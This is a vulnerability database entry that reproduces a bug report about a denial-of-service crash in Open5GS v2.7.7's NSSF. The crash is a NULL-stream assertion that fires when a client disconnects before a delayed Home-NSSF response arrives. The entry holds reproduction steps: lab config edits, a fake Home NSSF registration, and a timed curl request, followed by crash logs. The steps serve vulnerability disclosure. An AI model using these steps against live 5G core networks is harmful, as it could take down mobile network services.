| Titel | Open5gs NSSF v2.7.7 Denial of Service |
|---|
| Beschreibung | ### Open5GS Release, Revision, or Tag
v2.7.7
### Steps to reproduce
### Description
NSSF crashes if a Home-NSSF selection request causes an outbound
`nnssf-nsselection` query and the original client disconnects before the Home
NSSF response arrives.
In the NSSF client-response FSM path, the code retrieves the original
associated stream by ID:
```c
stream = ogs_sbi_stream_find_by_id(sbi_xact->assoc_stream_id);
...
nssf_nnrf_nsselection_handle_get_from_hnssf(home, stream, &message);
```
If the original requester has already timed out or reset the HTTP/2 stream,
`ogs_sbi_stream_find_by_id()` returns `NULL`. The called handler immediately
asserts that the stream pointer is non-NULL:
```c
ogs_assert(stream);
```
This makes a delayed but otherwise valid Home-NSSF response a process-killing
event once the original stream is gone.
### Steps to reproduce
This reproduction used the live Open5GS Docker lab with temporary test setup to
force the Home-NSSF path:
1. Add serving PLMN entries to the live lab configs so NRF accepts a fake Home
NSSF registration and local NSSF can build Home-NSSF discovery:
```yaml
# /home/ubuntu/docker-open5gs/configs/basic/nrf.yaml
nrf:
serving:
- plmn_id: { mcc: 001, mnc: 01 }
- plmn_id: { mcc: 999, mnc: 70 }
```
```yaml
# /home/ubuntu/docker-open5gs/configs/basic/nssf.yaml
nssf:
serving:
- plmn_id: { mcc: 001, mnc: 01 }
```
2. Restart `nrf` and `nssf`.
3. Register a fake Home NSSF into NRF with a long heartbeat and an
`nnssf-nsselection` service endpoint pointing to a local delayed h2c test
server (`10.33.33.1:18081` in this live setup).
4. Run a delayed Home-NSSF responder that accepts HTTP/2 cleartext and returns
a valid `AuthorizedNetworkSliceInfo` only after 3 seconds.
5. Send the original request with a 1-second timeout so the client aborts
before the delayed response returns:
```bash
curl --http2-prior-knowledge --max-time 1 -sS -i --get \
'http://10.33.33.5/nnssf-nsselection/v2/network-slice-information' \
--data-urlencode 'nf-id=test-amf' \
--data-urlencode 'nf-type=AMF' \
--data-urlencode 'home-plmn-id={"mcc":"999","mnc":"70"}' \
--data-urlencode 'slice-info-request-for-pdu-session={"sNssai":{"sst":1,"sd":"000001"},"homeSnssai":{"sst":1,"sd":"000001"},"roamingIndication":"HOME_ROUTED_ROAMING"}'
```
6. Wait for the delayed Home-NSSF response to arrive, then check the NSSF
container state and logs.
### Logs
```shell
Original requester:
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
Delayed Home-NSSF backend saw the request:
GET /nnssf-nsselection/v2/network-slice-information?slice-info-request-for-pdu-session=%7B%22sNssai%22%3A%7B%22sst%22%3A1%2C%22sd%22%3A%22000001%22%7D%2C%22roamingIndication%22%3A%22HOME_ROUTED_ROAMING%22%7D&nf-id=f806e06c-3509-41f1-a3ee-09fbeb9317ec&snssai=%7B%22sst%22%3A1%2C%22sd%22%3A%22000001%22%7D&nf-type=NSSF
Container state:
exited 139 2026-04-10T18:25:33.593273294Z
NSSF logs:
04/10 18:25:31.450: [sbi] INFO: RST_STREAM received: stream_id=1 (../lib/sbi/nghttp2-server.c:1288)
04/10 18:25:33.483: [nssf] FATAL: nssf_nnrf_nsselection_handle_get_from_hnssf: Assertion `stream' failed. (../src/nssf/nnssf-handler.c:189)
```
### Expected behaviour
If the original requester disconnects before the Home-NSSF response arrives,
NSSF should discard the late response or clean up the transaction safely without
touching a dead stream.
### Observed Behaviour
The original client times out, the stream is closed, and the later Home-NSSF
response causes NSSF to assert on a `NULL` stream pointer and exit with code
`139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| Quelle | ⚠️ https://github.com/open5gs/open5gs/issues/4431 |
|---|
| Benutzer | FrankyLin (UID 94345) |
|---|
| Einreichung | 20.04.2026 20:09 (vor 1 Monat) |
|---|
| Moderieren | 07.05.2026 18:56 (17 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 361906 [Open5GS bis 2.7.7 NSSF nghttp2-server.c ogs_sbi_stream_find_by_id Denial of Service] |
|---|
| Punkte | 20 |
|---|